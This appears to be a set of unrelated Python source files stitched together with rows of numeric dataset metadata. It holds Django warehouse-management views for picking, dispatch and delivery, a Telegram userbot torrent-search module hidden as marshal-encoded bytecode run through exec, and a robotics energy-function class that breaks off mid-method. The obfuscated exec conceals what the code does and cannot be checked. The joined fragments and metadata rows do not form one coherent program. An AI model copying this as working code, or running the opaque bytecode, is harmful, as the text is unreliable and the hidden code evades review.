goods_code=bin_qty_change.goods_code,
create_time__gte=cur_date).update(goods_qty=cycle_qty)
if int(data['goodsData'][j].get('pick_qty')) == pick_qty_change.pick_qty:
goods_qty_change.pick_stock = goods_qty_change.pick_stock - int(
data['goodsData'][j].get('pick_qty'))
goods_qty_change.picked_stock = goods_qty_change.picked_stock + int(
data['goodsData'][j].get('pick_qty'))
pick_qty_change.picked_qty = int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.pick_qty = bin_qty_change.pick_qty - int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.picked_qty = bin_qty_change.picked_qty + int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.save()
pick_qty_change.save()
bin_qty_change.save()
elif int(data['goodsData'][j].get('pick_qty')) < pick_qty_change.pick_qty:
goods_qty_change.pick_stock = goods_qty_change.pick_stock - dn_detail.pick_qty
goods_qty_change.picked_stock = goods_qty_change.picked_stock + int(
data['goodsData'][j].get('pick_qty'))
pick_qty_change.picked_qty = int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.pick_qty = bin_qty_change.pick_qty - pick_qty_change.pick_qty
bin_qty_change.picked_qty = bin_qty_change.picked_qty + int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.save()
pick_qty_change.save()
bin_qty_change.save()
dn_detail.picked_qty = dn_detail.picked_qty + int(data['goodsData'][j].get('pick_qty'))
if dn_detail.dn_status == 3:
dn_detail.dn_status = 4
if dn_detail.pick_qty > 0:
dn_detail.pick_qty = 0
dn_detail.save()
qs.save()
return Response({"Detail": "success"}, status=200)
class DnDispatchViewSet(viewsets.ModelViewSet):
"""
create:
Confirm Dispatch
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create']:
return serializers.DNListUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, pk):
qs = self.get_object()
if qs.dn_status != 4:
raise APIException({"detail": "This DN Status Not Picked"})
else:
qs.dn_status = 5
data = self.request.data
if driverlist.objects.filter(openid=self.request.auth.openid,
is_delete=False).exists():
driver = driverlist.objects.filter(openid=self.request.auth.openid,
driver_name=str(data['driver']),
is_delete=False).first()
dn_detail = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
dn_status=4, customer=qs.customer,
)
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']))
for i in range(len(dn_detail)):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=dn_detail[i].goods_code).first()
goods_qty_change.goods_qty = goods_qty_change.goods_qty - dn_detail[i].picked_qty
goods_qty_change.onhand_stock = goods_qty_change.onhand_stock - dn_detail[i].picked_qty
goods_qty_change.picked_stock = goods_qty_change.picked_stock - dn_detail[i].picked_qty
dn_detail[i].dn_status = 5
dn_detail[i].intransit_qty = dn_detail[i].picked_qty
dn_detail[i].save()
goods_qty_change.save()
if goods_qty_change.goods_qty == 0 and goods_qty_change.back_order_stock == 0:
goods_qty_change.delete()
for j in range(len(pick_qty_change)):
bin_qty_change = stockbin.objects.filter(openid=self.request.auth.openid,
goods_code=pick_qty_change[j].goods_code,
bin_name=pick_qty_change[j].bin_name).first()
bin_qty_change.goods_qty = bin_qty_change.goods_qty - pick_qty_change[j].picked_qty
if bin_qty_change.goods_qty == 0:
bin_qty_change.delete()
if stockbin.objects.filter(openid=self.request.auth.openid,
bin_name=pick_qty_change[j].bin_name).exists():
pass
else:
binset.objects.filter(openid=self.request.auth.openid,
bin_name=pick_qty_change[j].bin_name).update(empty_label=True)
else:
bin_qty_change.picked_qty = bin_qty_change.picked_qty - pick_qty_change[j].picked_qty
bin_qty_change.save()
driverdispatch.objects.create(openid=self.request.auth.openid,
driver_name=driver.driver_name,
dn_code=str(data['dn_code']),
contact=driver.contact,
creater=self.request.auth.name)
qs.save()
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "Driver Does Not Exists"})
class DnPODViewSet(viewsets.ModelViewSet):
"""
create:
Confirm POD (Proof of Delivery)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create']:
return serializers.DNListUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, pk):
qs = self.get_object()
if qs.dn_status != 5:
raise APIException({"detail": "This DN Status Not Intran-Sit"})
else:
qs.dn_status = 6
data = self.request.data
for i in range(len(data['goodsData'])):
delivery_damage_qty = data['goodsData'][i].get('delivery_damage_qty')
delivery_actual_qty = data['goodsData'][i].get('intransit_qty')
if delivery_actual_qty < 0:
raise APIException({"detail": "Delivery Actual QTY Must >= 0"})
else:
if delivery_damage_qty < 0:
raise APIException({"detail": "Delivery Damage QTY Must >= 0"})
dn_detail = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
dn_status=5, customer=qs.customer,
)
for j in range(len(data['goodsData'])):
delivery_damage_qty = data['goodsData'][j].get('delivery_damage_qty')
delivery_actual_qty = data['goodsData'][j].get('intransit_qty')
goods_code = data['goodsData'][j].get('goods_code')
if delivery_damage_qty > 0:
goods_detail = dn_detail.filter(goods_code=goods_code).first()
if delivery_actual_qty > goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_more_qty = delivery_actual_qty - goods_detail.intransit_qty
goods_detail.delivery_damage_qty = delivery_damage_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
elif delivery_actual_qty < goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_shortage_qty = goods_detail.intransit_qty - delivery_actual_qty
goods_detail.delivery_damage_qty = delivery_damage_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
elif delivery_actual_qty == goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_damage_qty = delivery_damage_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
else:
continue
goods_detail.save()
elif delivery_damage_qty == 0:
goods_detail = dn_detail.filter(goods_code=goods_code).first()
if delivery_actual_qty > goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_more_qty = delivery_actual_qty - goods_detail.intransit_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
elif delivery_actual_qty < goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_shortage_qty = goods_detail.intransit_qty - delivery_actual_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
elif delivery_actual_qty == goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
else:
continue
goods_detail.save()
qs.save()
return Response({"detail": "success"}, status=200)
class FileListDownloadView(viewsets.ModelViewSet):
renderer_classes = (FileListRenderCN, ) + tuple(api_settings.DEFAULT_RENDERER_CLASSES)
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['list']:
return serializers.FileListRenderSerializer
else:
return self.http_method_not_allowed(request=self.request)
def get_lang(self, data):
lang = self.request.META.get('HTTP_LANGUAGE')
if lang:
if lang == 'zh-hans':
return FileListRenderCN().render(data)
else:
return FileListRenderEN().render(data)
else:
return FileListRenderEN().render(data)
def list(self, request, *args, **kwargs):
from datetime import datetime
dt = datetime.now()
data = (
FileListRenderSerializer(instance).data
for instance in self.filter_queryset(self.get_queryset())
)
renderer = self.get_lang(data)
response = StreamingHttpResponse(
renderer,
content_type="text/csv"
)
response['Content-Disposition'] = "attachment; filename='dnlist_{}.csv'".format(str(dt.strftime('%Y%m%d%H%M%S%f')))
return response
class FileDetailDownloadView(viewsets.ModelViewSet):
renderer_classes = (FileDetailRenderCN, ) + tuple(api_settings.DEFAULT_RENDERER_CLASSES)
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnDetailFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnDetailModel.objects.none()
def get_serializer_class(self):
if self.action in ['list']:
return serializers.FileDetailRenderSerializer
else:
return self.http_method_not_allowed(request=self.request)
def get_lang(self, data):
lang = self.request.META.get('HTTP_LANGUAGE')
if lang:
if lang == 'zh-hans':
return FileDetailRenderCN().render(data)
else:
return FileDetailRenderEN().render(data)
else:
return FileDetailRenderEN().render(data)
def list(self, request, *args, **kwargs):
from datetime import datetime
dt = datetime.now()
data = (
FileDetailRenderSerializer(instance).data
for instance in self.filter_queryset(self.get_queryset())
)
renderer = self.get_lang(data)
response = StreamingHttpResponse(
renderer,
content_type="text/csv"
)
response['Content-Disposition'] = "attachment; filename='dndetail_{}.csv'".format(str(dt.strftime('%Y%m%d%H%M%S%f')))
return response
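# --- Illustrative client sketch (added; not part of the original module) ---
# get_lang() in the two download views above selects the CSV renderer from the request's
# "language" header (seen by Django as HTTP_LANGUAGE): "zh-hans" picks the CN renderer,
# anything else falls back to EN. A minimal client call might look like the helper below;
# the endpoint URL and any authentication details are assumptions, not taken from this project.
def _example_download_dn_csv(list_url, lang="zh-hans"):
    """Hypothetical helper: stream the DN list CSV in the requested language to a file."""
    import requests  # assumed to be available on the client side
    resp = requests.get(list_url, headers={"language": lang}, stream=True)
    resp.raise_for_status()
    with open("dnlist.csv", "wb") as f:
        for chunk in resp.iter_content(chunk_size=8192):
            f.write(chunk)
    return "dnlist.csv"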
| 65.001485
| 150
| 0.467529
| 12,020
| 131,303
| 4.746339
| 0.025874
| 0.039018
| 0.038913
| 0.038054
| 0.923928
| 0.908538
| 0.898056
| 0.887136
| 0.880353
| 0.875217
| 0
| 0.004344
| 0.463577
| 131,303
| 2,019
| 151
| 65.03368
| 0.805648
| 0.004356
| 0
| 0.844645
| 0
| 0
| 0.031182
| 0.001442
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030223
| false
| 0.002651
| 0.018558
| 0
| 0.144221
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6d79e29b3200be71dac36805e781dc38e956d00
| 8,923
|
py
|
Python
|
userbot/modules/torrentsearch.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/torrentsearch.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/torrentsearch.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#Encript Marshal By XVenom
#https://github.com/xvenom15
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x8a\x00\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x02l\x04m\x05Z\x06\x01\x00d\x00d\x03l\x07m\x08Z\x08m\tZ\t\x01\x00d\x00d\x04l\nm\x0bZ\x0b\x01\x00e\x0bd\x05d\x06d\x07\x8d\x02d\x08d\t\x84\x00\x83\x01Z\x0cd\nd\x0b\x84\x00Z\re\x0bd\x05d\x0cd\x07\x8d\x02d\rd\x0e\x84\x00\x83\x01Z\x0ee\x08\xa0\x0fd\x0fd\x10i\x01\xa1\x01\x01\x00d\x01S\x00)\x11\xe9\x00\x00\x00\x00N)\x01\xda\rBeautifulSoup)\x02\xda\x08CMD_HELP\xda\x17TEMP_DOWNLOAD_DIRECTORY)\x01\xda\x08registerTz\n^\\.ts (.*))\x02Z\x08outgoingZ\x07patternc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00s\x84\x01\x00\x00|\x00\xa0\x00d\x01\xa1\x01I\x00d\x00H\x00\x01\x00|\x00j\x01\xa0\x02d\x02\xa1\x01}\x01t\x03\xa0\x04d\x03|\x01\x9b\x00\x9d\x02\xa1\x01}\x02t\x05\xa0\x06|\x02j\x07\xa1\x01}\x03|\x03|\x02\xa0\x05\xa1\x00k\x03rX|\x00\xa0\x00d\x04\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00d\x05}\x04d\x06}\x05zD|\x05d\x027\x00}\x05|\x03|\x05\x19\x00}\x06d\x07\xa0\x08|\x05|\x06d\x08\x19\x00|\x06d\t\x19\x00|\x06d\n\x19\x00|\x06d\x0b\x19\x00|\x06d\x0c\x19\x00\xa1\x06}\x07|\x04|\x077\x00}\x04W\x00q`\x04\x00t\tk\nr\xbc\x01\x00\x01\x00\x01\x00Y\x00q\xc0Y\x00q`X\x00q`|\x04s\xd4|\x00\xa0\x00d\r\xa1\x01I\x00d\x00H\x00S\x00t\n\x9b\x00d\x0e|\x01\x9b\x00d\x0f\x9d\x04}\x08t\x0b|\x08d\x10d\x11d\x12\x8d\x03\x8f\x14}\t|\t\xa0\x0ct\r|\x04\x83\x01\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x0ej\x0b|\x08d\x13d\x14d\x12\x8d\x03}\n|\n\xa0\x0f\xa1\x00}\x0bt\x03j\x10d\x15d\x16|\x0bi\x01d\x17\x8d\x02\xa0\x05\xa1\x00\xa0\x04d\x18\xa1\x01\xa0\x04d\x19\xa1\x01}\x0cd\x1a|\x0c\x9b\x00\x9d\x02}\rd\x1b|\x01\x9b\x00d\x1c|\r\x9b\x00d\x1d\x9d\x05}\x0et\x11\xa0\x12|\x08\xa1\x01\x01\x00|\x00j\x00|\x0ed\x1ed\x1f\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00) Nz"`Please wait, fetching results...`\xe9\x01\x00\x00\x00z3https://sjprojectsapi.herokuapp.com/torrent/?query=z(**Some error occured**\n`Try Again Later`\xda\x00r\x01\x00\x00\x00zM<-----{}----->\nName: {}\nSeeders: {}\nSize: {}\nAge: {}\n<--Magnet Below-->\n{}\n\n\n\xda\x04nameZ\x06seeder\xda\x04sizeZ\x03ageZ\x06magnetz\x19`Error: No results found`\xfa\x01/z\x04.txtz\x02w+\xda\x04utf8)\x01\xda\x08encoding\xda\x01rz\x05utf-8z!https://nekobin.com/api/documentsZ\x07content)\x01\xda\x04json\xda\x06result\xda\x03keyz\x18https://nekobin.com/raw/z!`Here the results for the query: z\x18`\n\nPasted to: 
[Nekobin](\xfa\x01)F\xa9\x01Z\x0clink_preview)\x13\xda\x04edit\xda\rpattern_match\xda\x05group\xda\x08requests\xda\x03getr\x0e\x00\x00\x00\xda\x05loads\xda\x04text\xda\x06format\xda\rBaseExceptionr\x04\x00\x00\x00\xda\x04open\xda\x05write\xda\x03str\xda\x06codecs\xda\x04read\xda\x04post\xda\x02os\xda\x06remove)\x0f\xda\x01eZ\x05queryZ\x08responseZ\x02tsZ\x08listdata\xda\x03runZ\x02r1Z\x05list1Z\ttsfilelocZ\x08out_file\xda\x02fd\xda\x04datar\x10\x00\x00\x00\xda\x03urlZ\x07caption\xa9\x00r)\x00\x00\x00r\x07\x00\x00\x00\xda\tgengkapak\x0c\x00\x00\x00sV\x00\x00\x00\x00\x02\x10\x01\x0c\x01\x04\x01\x08\xff\x04\x03\x0c\x01\x0c\x01\x10\x01\x04\x01\x04\x01\x04\x02\x02\x01\x08\x01\x08\x01\x04\x01\x02\x00\x06\x00\x06\x00\x06\x00\x06\x00\x06\xff\x04\x02\x0c\x01\x0e\x01\x0c\x02\x04\x01\x10\x02\x10\x01\x10\x01\x18\x01\x10\x01\x08\x01\x06\x01\x06\xff\n\x01\x02\xff\x04\x01\x02\xff\x04\x02\n\x01\x12\x01\n\x01r*\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s^\x00\x00\x00d\x01}\x01g\x00}\x02|\x01t\x00|\x00\x83\x01k\x03rZ|\x00|\x01\x19\x00}\x03d\x02}\x04t\x01j\x02|\x04|\x03\xa0\x03d\x03\xa1\x01d\x04\x8d\x02\xa0\x04\xa1\x00}\x05d\x05|\x05d\x06\x19\x00\x9b\x00\x9d\x02}\x04|\x02\xa0\x05|\x04\xa1\x01\x01\x00|\x01d\x077\x00}\x01q\x08|\x02S\x00)\x08Nr\x01\x00\x00\x00z\x19https://del.dog/documentsz\x05UTF-8)\x01r\'\x00\x00\x00z\x14https://del.dog/raw/r\x10\x00\x00\x00r\x06\x00\x00\x00)\x06\xda\x03lenr\x16\x00\x00\x00r!\x00\x00\x00\xda\x06encoder\x0e\x00\x00\x00\xda\x06append)\x06\xda\x07magnets\xda\x07counter\xda\x04urls\xda\x07messager(\x00\x00\x00r\r\x00\x00\x00r)\x00\x00\x00r)\x00\x00\x00r\x07\x00\x00\x00\xda\x06dogbin3\x00\x00\x00s\x14\x00\x00\x00\x00\x01\x04\x01\x04\x01\x0c\x01\x08\x01\x04\x01\x18\x01\x0e\x01\n\x01\n\x01r2\x00\x00\x00z\x10^.tos(?: 
|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s|\x02\x00\x00|\x00j\x00r\nd\x00S\x00d\x01d\x02i\x01}\x01|\x00j\x01\xa0\x02d\x03\xa1\x01}\x02t\x03|\x02\x83\x01\x01\x00|\x00\xa0\x04d\x04|\x02\x17\x00d\x05\x17\x00\xa1\x01I\x00d\x00H\x00\x01\x00d\x06|\x02k\x06rl|\x02\xa0\x05d\x06d\x07\xa1\x02}\x02t\x03|\x02\x83\x01\x01\x00t\x06\xa0\x07d\x08|\x02\x17\x00|\x01\xa1\x02}\x03n\x10t\x06\xa0\x07d\t|\x02\x17\x00|\x01\xa1\x02}\x03t\x08|\x03j\td\n\x83\x02}\x04g\x00}\x05g\x00}\x06g\x00}\x07d\x0b}\x08|\x04\xa0\nd\x0cd\rd\x0ei\x01\xa1\x02D\x00]\x96}\tz<|\tj\x0bj\x0cd\x0f\x19\x00}\n|\nd\x10d\x00\x85\x02\x19\x00}\n|\x07\xa0\r|\n\xa1\x01\x01\x00|\x05\xa0\rd\x11|\tj\x0bj\x0cd\x12\x19\x00\x17\x00\xa1\x01\x01\x00W\x00n<\x04\x00t\x0ek\nr\xfc\x01\x00\x01\x00\x01\x00Y\x00n*\x04\x00t\x0fk\n\x90\x01r\x10\x01\x00\x01\x00\x01\x00Y\x00n\x16\x04\x00t\x10k\n\x90\x01r$\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00|\x08d\x13k\x02\x90\x01r6\x01\x00\x90\x01q@|\x08d\x037\x00}\x08q\xa8|\x05\x90\x01sZ|\x00\xa0\x04d\x14\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00t\x03d\x15\x83\x01\x01\x00|\x05D\x00]h}\x0bt\x06\xa0\x07|\x0b|\x01\xa1\x02}\x03t\x08|\x03j\td\n\x83\x02}\x04|\x04\xa0\nd\x0cd\rd\x16i\x01\xa1\x02D\x00]8}\tz\x1a|\tj\x0bj\x0cd\x12\x19\x00}\x0c|\x06\xa0\r|\x0c\xa1\x01\x01\x00W\x00n\x16\x04\x00t\x11k\n\x90\x01r\xc6\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00\x90\x01q\x92\x90\x01qft\x03d\x17\x83\x01\x01\x00t\x12|\x06\x83\x01}\rt\x03d\x18\x83\x01\x01\x00d\x19}\x0ez\x10|\x02\xa0\x05d\x07d\x06\xa1\x02}\x02W\x00n\x16\x04\x00t\x13k\n\x90\x02r\x12\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00d\x1a\xa0\x14|\x02\xa1\x01d\x1b\x17\x00}\x0ed\x0b}\x08|\x08t\x15|\x07\x83\x01k\x03\x90\x02rd|\x0ed\x1c\xa0\x14|\x07|\x08\x19\x00\xa1\x01\x17\x00d\x1d\xa0\x14|\r|\x08\x19\x00\xa1\x01\x17\x00d\x1e\x17\x00}\x0e|\x08d\x037\x00}\x08\x90\x02q&|\x00j\x04|\x0ed\x1fd \x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)!Nz\nUser-AgentziMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36r\x06\x00\x00\x00z\x0eSearching for z\x05.....\xfa\x01 \xfa\x01+z=https://www.torrentdownloads.me/search/?new=1&s_cat=0&search=z/https://www.torrentdownloads.me/search/?search=Z\x04lxmlr\x01\x00\x00\x00\xda\x03divZ\x05classz\x13grey_bar3 back_none\xda\x05title\xe9\x14\x00\x00\x00z\x1fhttps://www.torrentdownloads.meZ\x04href\xe9\x0b\x00\x00\x00z0Either the Keyword was restricted or not found..z\rFound URLS...z\x13grey_bar1 back_nonez\x10Found Magnets...z\x1cDogged Magnets to del.dog...r\x07\x00\x00\x00z\x1d**Torrent Search Query**\n`{}`z\r\n**Results**\nu\x08\x00\x00\x00\xe2\x81\x8d 
[{}]z\x04({})z\x02\n\nFr\x12\x00\x00\x00)\x16Z\x08fwd_fromr\x14\x00\x00\x00r\x15\x00\x00\x00\xda\x05printr\x13\x00\x00\x00\xda\x07replacer\x16\x00\x00\x00r\x17\x00\x00\x00\xda\x02bsr\x19\x00\x00\x00Z\x08find_all\xda\x01p\xda\x01ar-\x00\x00\x00\xda\x08KeyError\xda\tTypeError\xda\x0eAttributeError\xda\tExceptionr2\x00\x00\x00r\x1b\x00\x00\x00r\x1a\x00\x00\x00r+\x00\x00\x00)\x0fZ\x05eventZ\x07headersZ\nsearch_strZ\x03res\xda\x06sourcer0\x00\x00\x00r.\x00\x00\x00Z\x06titlesr/\x00\x00\x00r5\x00\x00\x00r6\x00\x00\x00r(\x00\x00\x00Z\x02mgZ\rshorted_links\xda\x03msgr)\x00\x00\x00r)\x00\x00\x00r\x07\x00\x00\x00\xda\ntor_search@\x00\x00\x00s\x9c\x00\x00\x00\x00\x02\x06\x01\x04\x02\x02\x00\x02\xff\x04\x03\x0c\x02\x08\x01\x18\x01\x08\x01\x0c\x01\x08\x01\x04\x01\x02\x01\x02\xff\x02\x02\x02\xfd\x06\x06\x04\x01\x02\x01\x02\xff\x02\x02\x02\xfd\x04\x05\x0c\x01\x04\x01\x04\x01\x04\x01\x04\x01\x14\x02\x02\x01\x0c\x01\x0c\x01\n\x01\x1a\x01\x0e\x01\x04\x01\x10\x01\x04\x01\x10\x01\x06\x01\n\x01\x06\x01\n\x01\x06\x01\x10\x01\x04\x02\x08\x01\x08\x01\x0c\x02\x0c\x01\x14\x01\x02\x01\x0c\x01\x0e\x01\x10\x01\x0e\x01\x08\x01\x08\x01\x08\x01\x04\x01\x02\x01\x10\x01\x10\x01\x06\x01\x04\x01\x02\xff\x02\x01\x02\xff\x04\x02\x04\x01\x0e\x01\x10\x01\x0c\xff\x02\x01\x02\xff\x04\x02\x0c\x01rD\x00\x00\x00Z\x07torrentz\x97`.ts` **Query** \nUsage: Search for torrent query and display results. \n\n`.tos` **Query** \nUsage: Search for torrent query and display results.)\x10r\x1f\x00\x00\x00r\x0e\x00\x00\x00r"\x00\x00\x00r\x16\x00\x00\x00Z\x03bs4r\x02\x00\x00\x00r;\x00\x00\x00Z\x07userbotr\x03\x00\x00\x00r\x04\x00\x00\x00Z\x0euserbot.eventsr\x05\x00\x00\x00r*\x00\x00\x00r2\x00\x00\x00rD\x00\x00\x00\xda\x06updater)\x00\x00\x00r)\x00\x00\x00r)\x00\x00\x00r\x07\x00\x00\x00\xda\x08<module>\x03\x00\x00\x00s\x1e\x00\x00\x00\x08\x01\x08\x01\x08\x01\x08\x01\x0c\x01\x10\x01\x0c\x03\n\x01\n&\x08\r\n\x01\nN\x04\x01\x02\x01\x02\xfe'))
| 2,230.75
| 8,852
| 0.751877
| 1,872
| 8,923
| 3.574786
| 0.21688
| 0.153317
| 0.103556
| 0.075314
| 0.272116
| 0.225941
| 0.173939
| 0.125672
| 0.101315
| 0.073371
| 0
| 0.324275
| 0.010198
| 8,923
| 4
| 8,852
| 2,230.75
| 0.433424
| 0.005828
| 0
| 0
| 0
| 0.5
| 0.433033
| 0.226381
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 9
|
fc04615fb3a0adb91f1a7643930c3ccaef2ece2b
| 26,120
|
py
|
Python
|
cep/energies/goto_leafs.py
|
hjw-1014/Multi-Objective-Reactive-Motion-Planning-in-Mobile-Manipulators
|
9a8801e9c663174b753c4852b2313c5a3f302434
|
[
"MIT"
] | null | null | null |
cep/energies/goto_leafs.py
|
hjw-1014/Multi-Objective-Reactive-Motion-Planning-in-Mobile-Manipulators
|
9a8801e9c663174b753c4852b2313c5a3f302434
|
[
"MIT"
] | null | null | null |
cep/energies/goto_leafs.py
|
hjw-1014/Multi-Objective-Reactive-Motion-Planning-in-Mobile-Manipulators
|
9a8801e9c663174b753c4852b2313c5a3f302434
|
[
"MIT"
] | null | null | null |
import math
import os
import torch
import torch.distributions as tdist
import numpy as np
import cascade_control_dx
from .energy_leaf import EnergyLeaf
from .energy_leaf import EnergyLeaf_x
#from _utils import torch2numpy
from cep.utils import eul2rot, rot2eul, rot2quat
from cep.liegroups.torch import SO3, SE3
from icecream import ic
import matplotlib.pyplot as plt
import time
global num
num = 2
global closest_points
closest_points = []
global count
count = 1
global CREATE_DIR
CREATE_DIR = False
global path
path = ""
def torch2numpy(x):
if x is None:
print(x)  # NOTE: execution falls through after printing, so x.device below will still raise if x is None
if x.device.type == 'cuda':
return x.cpu().detach().numpy()
else:
return x.detach().numpy()
class TaskGoToLeaf(EnergyLeaf):
def __init__(self, dim=6, A = None, b = None, R = None, var=None):
super(TaskGoToLeaf, self).__init__()
self.dim = dim
if A is None:
A = torch.eye(self.dim).float()
self.register_buffer('A', A)
if b is None:
b = torch.zeros(3).float()
self.register_buffer('b', b)
if var is None:
var = torch.eye(self.dim).float() * 1.
self.register_buffer('var', var)
if R is None:
R = torch.eye(3).float()
R_inv = torch.inverse(R)
self.register_buffer('R', R)
self.register_buffer('R_inv', R_inv)
## variables for computation ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
x = state[0] # Tensor(4, 4), end-effector rotation and position SE(3)
v = state[1] # Tensor (1, 6), end-effector spatial velocity V_b
#print('state:', state)
# print('x: ', x)
# print('v: ', v)
#print('self.R_inv: ', self.R_inv) # Tensor (4, 4)
#print('R: ', self.R) # Tensor (4, 4)
Htl = torch.matmul(self.R_inv, x) # R_inv * X
#print('Htl: ', Htl)
Xe = SE3.from_matrix(Htl) # <cep.liegroups.torch.se3.SE3Matrix>, SE(3)
#print('Xe: ', Xe)
xtl = Xe.log() # Tensor(1, 6), (omega, V)
#print('xtl: ', xtl)
vtl = -xtl
A = SE3.from_matrix(self.R) # <cep.liegroups.torch.se3.SE3Matrix>, SE(3), R
#print('A: ', A)
Adj_lw = A.adjoint() # Adjoint map (Spatial velocity from one frame to another frame), Tensor (6,6),
#print('Adj_lw: ', Adj_lw)
ve_w = torch.matmul(Adj_lw, vtl) # Tensor(6, 1)
#print('v_ew: ', ve_w)
###########################################
scale = 20.
mu = scale * ve_w - 1.2 * scale * v
#print('mu: ', mu) # Tensor(6, 1)
self.p_dx = tdist.MultivariateNormal(mu, self.var) # self.var->torch.size(6, 6)
def log_prob(self, action):
'''
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 6])
